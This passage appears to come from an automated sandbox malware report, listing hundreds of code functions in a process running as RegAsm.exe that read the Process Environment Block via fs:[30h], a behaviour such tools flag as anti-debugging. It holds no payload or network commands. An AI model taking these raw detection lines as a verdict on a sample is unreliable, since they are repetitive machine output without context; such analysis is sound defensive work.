                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE132D mov eax, dword ptr fs:[00000030h]4_2_02CE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4F32A mov eax, dword ptr fs:[00000030h]4_2_02C4F32A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C17330 mov eax, dword ptr fs:[00000030h]4_2_02C17330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA20DE mov eax, dword ptr fs:[00000030h]4_2_02CA20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF50D9 mov eax, dword ptr fs:[00000030h]4_2_02CF50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C490DB mov eax, dword ptr fs:[00000030h]4_2_02C490DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C450E4 mov eax, dword ptr fs:[00000030h]4_2_02C450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C450E4 mov ecx, dword ptr fs:[00000030h]4_2_02C450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A0E3 mov ecx, dword ptr fs:[00000030h]4_2_02C1A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C280E9 mov eax, dword ptr fs:[00000030h]4_2_02C280E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1C0F0 mov eax, dword ptr fs:[00000030h]4_2_02C1C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C620F0 mov ecx, dword ptr fs:[00000030h]4_2_02C620F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2208A mov eax, dword ptr fs:[00000030h]4_2_02C2208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D08D mov eax, dword ptr fs:[00000030h]4_2_02C1D08D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C25096 mov eax, dword ptr fs:[00000030h]4_2_02C25096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4D090 mov eax, dword ptr fs:[00000030h]4_2_02C4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4D090 mov eax, dword ptr fs:[00000030h]4_2_02C4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5909C mov eax, dword ptr fs:[00000030h]4_2_02C5909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE60B8 mov eax, dword ptr fs:[00000030h]4_2_02CE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE60B8 mov ecx, dword ptr fs:[00000030h]4_2_02CE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C22050 mov eax, dword ptr fs:[00000030h]4_2_02C22050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC705E mov ebx, dword ptr fs:[00000030h]4_2_02CC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC705E mov eax, dword ptr fs:[00000030h]4_2_02CC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B052 mov eax, dword ptr fs:[00000030h]4_2_02C4B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5060 mov eax, dword ptr fs:[00000030h]4_2_02CF5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov ecx, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4C073 mov eax, dword ptr fs:[00000030h]4_2_02C4C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A020 mov eax, dword ptr fs:[00000030h]4_2_02C1A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1C020 mov eax, dword ptr fs:[00000030h]4_2_02C1C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF51CB mov eax, dword ptr fs:[00000030h]4_2_02CF51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE61C3 mov eax, dword ptr fs:[00000030h]4_2_02CE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE61C3 mov eax, dword ptr fs:[00000030h]4_2_02CE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5D1D0 mov eax, dword ptr fs:[00000030h]4_2_02C5D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5D1D0 mov ecx, dword ptr fs:[00000030h] | 4_2_02C5D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CF61E5 mov eax, dword ptr fs:[00000030h] | 4_2_02CF61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h] | 4_2_02C451EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C251ED mov eax, dword ptr fs:[00000030h] | 4_2_02C251ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C501F8 mov eax, dword ptr fs:[00000030h] | 4_2_02C501F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C60185 mov eax, dword ptr fs:[00000030h] | 4_2_02C60185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CDC188 mov eax, dword ptr fs:[00000030h] | 4_2_02CDC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CDC188 mov eax, dword ptr fs:[00000030h] | 4_2_02CDC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h] | 4_2_02CA019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h] | 4_2_02CA019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h] | 4_2_02CA019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA019F mov eax, dword ptr fs:[00000030h] | 4_2_02CA019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1A197 mov eax, dword ptr fs:[00000030h] | 4_2_02C1A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1A197 mov eax, dword ptr fs:[00000030h] | 4_2_02C1A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1A197 mov eax, dword ptr fs:[00000030h] | 4_2_02C1A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h] | 4_2_02CD11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h] | 4_2_02CD11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h] | 4_2_02CD11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CD11A4 mov eax, dword ptr fs:[00000030h] | 4_2_02CD11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3B1B0 mov eax, dword ptr fs:[00000030h] | 4_2_02C3B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h] | 4_2_02C19148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h] | 4_2_02C19148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h] | 4_2_02C19148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C19148 mov eax, dword ptr fs:[00000030h] | 4_2_02C19148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h] | 4_2_02CB4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h] | 4_2_02CB4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB4144 mov ecx, dword ptr fs:[00000030h] | 4_2_02CB4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h] | 4_2_02CB4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB4144 mov eax, dword ptr fs:[00000030h] | 4_2_02CB4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C27152 mov eax, dword ptr fs:[00000030h] | 4_2_02C27152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C26154 mov eax, dword ptr fs:[00000030h] | 4_2_02C26154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C26154 mov eax, dword ptr fs:[00000030h] | 4_2_02C26154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1C156 mov eax, dword ptr fs:[00000030h] | 4_2_02C1C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CF5152 mov eax, dword ptr fs:[00000030h] | 4_2_02CF5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB9179 mov eax, dword ptr fs:[00000030h] | 4_2_02CB9179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F172 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CCA118 mov ecx, dword ptr fs:[00000030h] | 4_2_02CCA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CCA118 mov eax, dword ptr fs:[00000030h] | 4_2_02CCA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CCA118 mov eax, dword ptr fs:[00000030h] | 4_2_02CCA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CCA118 mov eax, dword ptr fs:[00000030h] | 4_2_02CCA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE0115 mov eax, dword ptr fs:[00000030h] | 4_2_02CE0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C50124 mov eax, dword ptr fs:[00000030h] | 4_2_02C50124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C21131 mov eax, dword ptr fs:[00000030h] | 4_2_02C21131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C21131 mov eax, dword ptr fs:[00000030h] | 4_2_02C21131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B136 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C2B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C2B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C2B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C2B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C2B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2B6C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C2B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5A6C7 mov ebx, dword ptr fs:[00000030h] | 4_2_02C5A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5A6C7 mov eax, dword ptr fs:[00000030h] | 4_2_02C5A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h] | 4_2_02CE16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h] | 4_2_02CE16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h] | 4_2_02CE16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE16CC mov eax, dword ptr fs:[00000030h] | 4_2_02CE16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CDF6C7 mov eax, dword ptr fs:[00000030h] | 4_2_02CDF6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C516CF mov eax, dword ptr fs:[00000030h] | 4_2_02C516CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C4D6E0 mov eax, dword ptr fs:[00000030h] | 4_2_02C4D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C4D6E0 mov eax, dword ptr fs:[00000030h] | 4_2_02C4D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h] | 4_2_02CB36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h] | 4_2_02CB36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h] | 4_2_02CB36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h] | 4_2_02CB36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h] | 4_2_02CB36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CB36EE mov eax, dword ptr fs:[00000030h] | 4_2_02CB36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C536EF mov eax, dword ptr fs:[00000030h] | 4_2_02C536EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h] | 4_2_02C9E6F2
